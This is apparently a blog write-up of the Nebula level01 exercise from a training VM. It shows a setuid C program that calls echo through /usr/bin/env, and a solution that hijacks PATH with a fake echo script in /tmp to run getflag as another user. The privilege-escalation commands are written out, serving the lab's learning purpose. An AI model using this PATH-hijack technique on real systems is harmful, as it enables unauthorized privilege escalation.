Nebula 01

Exploit Exercises Write-Up

Posted on June 7, 2017 as Exploit Exercises. 1 min read.

Introduction

Let's start another challenge from Nebula machine and see what's our target this time.

Challenge

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Solution

Firstly, from the code, we know that /usr/bin/env will execute a program with the current enviroment. It includes a $PATH variable, which stores information where programs can be found. That way we can change the $PATH to some other folder, containing echo script. Then it will run the getflag program, just like in the previous level.

[email protected]:~$ cd /home/flag01
[email protected]:/home/flag01$ ls -l
total 8
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

In addition, setuid bit is set, so it will run as the owner flag01. Let's start from creating a tmp directory, which will be our fake one.

[email protected]:/home/flag01$ mkdir /tmp/level01

Now we are able to create fake PATH using export command, and then create the fake echo program.

[email protected]:/home/flag01$ export PATH="/tmp/level01:$PATH"
[email protected]:/home/flag01$ echo "getflag" > /tmp/level01/echo

Don't forget about the execute permissions.

[email protected]:/home/flag01$ chmod +x /tmp/level01/echo

And we're ready to go, and run this vulnerable program.

[email protected]:/home/flag01$ ./flag01
You have successfully executed getflag on a target account

Another challenge completed!

Keep learning and stay safe!

~ W3ndige